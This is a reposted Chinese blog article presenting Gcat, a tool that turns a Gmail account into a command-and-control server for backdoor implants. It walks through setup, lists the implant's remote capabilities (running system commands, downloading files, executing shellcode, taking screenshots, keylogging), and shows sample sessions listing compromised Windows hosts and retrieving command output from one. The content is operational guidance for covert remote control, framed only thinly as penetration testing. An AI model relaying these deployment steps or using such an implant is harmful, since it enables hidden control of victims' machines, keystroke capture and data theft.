转载

巧用Gmail做你的C&C服务器

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

巧用Gmail做你的C&C服务器

在渗透测试中,C&C(命令与控制)服务器一直是个关键的问题……Gmail或许是一个不错的选择?那么这款名为Gcat的工具就得出动了。

操作步骤

为了做这个工作,你需要做好下面准备

一个Gmail账号(别用你的个人账号哦……你懂的)

在安全设置中,开启"Allow less secure apps"

repo包含两个文件:

gcat.py 用于命令执行 implant.py 用于后门部署

在上述两个文件中,编辑gmail_user and gmail_pwd为你自己的

使用

Gcat工具 

optional arguments:   -h, --help            show this help message and exit   -v, --version         show program's version number and exit   -id ID                Client to target   -jobid JOBID          Job id to retrieve   -list                 List available clients   -info                 Retrieve info on specified client

命令 

Commands to execute on an implant  -cmd CMD              Execute a system command  -download PATH        Download a file from a clients system  -exec-shellcode FILE  Execute supplied shellcode on a client  -screenshot           Take a screenshot  -lock-screen          Lock the clients screen  -force-checkin        Force a check in  -start-keylogger      Start keylogger  -stop-keylogger       Stop keylogger

部署后门后,用以下命令测试一下:

#~ python gcat.py -list f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86 90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

输出的是UUID,用于标识每个操作系统

操作实例

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all' [*] Command sent successfully with jobid: SH3C4gv Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command Lets get the results! #~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv      DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)' JOBID: SH3C4gv FG WINDOW: 'Command Prompt - C:/Python27/python.exe implant.py' CMD: 'ipconfig /all' Windows IP Configuration  Host Name . . . . . . . . . . . . : unknown-2d44b52  Primary Dns Suffix  . . . . . . . :   Node Type . . . . . . . . . . . . : Unknown  IP Routing Enabled. . . . . . . . : No  WINS Proxy Enabled. . . . . . . . : No -- SNIP --

Gcat下载

下载地址

*本文作者:fu4k ,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Java设计模式 Jenkins进阶系列 openfire参考指南 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 ANTLR教程 Ant教程 java实例教程 SpringCloud Elastic-Job-Lite XStream教程 深入浅出MyBatis Hazelcast教程 ibaties教程 SVN教程 rabittmq教程 Hadoop教程 solr教程 WebService CXF学习 springcloud-demo JPA教程 ActiveMQ中文指南 Java内存模型 java-demo dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Cloud Circuit Breaker快速入门Demo
  2. 2 Spring Cloud Bus快速入门Demo
  3. 3 Spring Cloud Config快速入门Demo
  4. 4 Spring Cloud Function快速入门Demo
  5. 5 SSPanel-Uim搭建教程 2023年全新定制版主题-解决老版本命令失效问题
  6. 6 Spring Boot集成Milvus和deeplearning4j实现图搜图功能
  7. 7 Spring Boot集成Aviator实现参数校验
  8. 8 ACME自动申请免费的通配符https域名证书
  9. 9 wordpress 数据库和文件优化
  10. 10 CentOS安装Docker与Docker-Compose
网站信息
  • 文章总数:82,696 篇
  • 文件总数:284,257 个
  • 标签总数:2,380 个
  • 分类总数:84 个
  • 留言数量:2,560 条
  • 在线人数:636 人
  • 运行天数:4,392天
  • 最后更新:2024年11月05日20点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG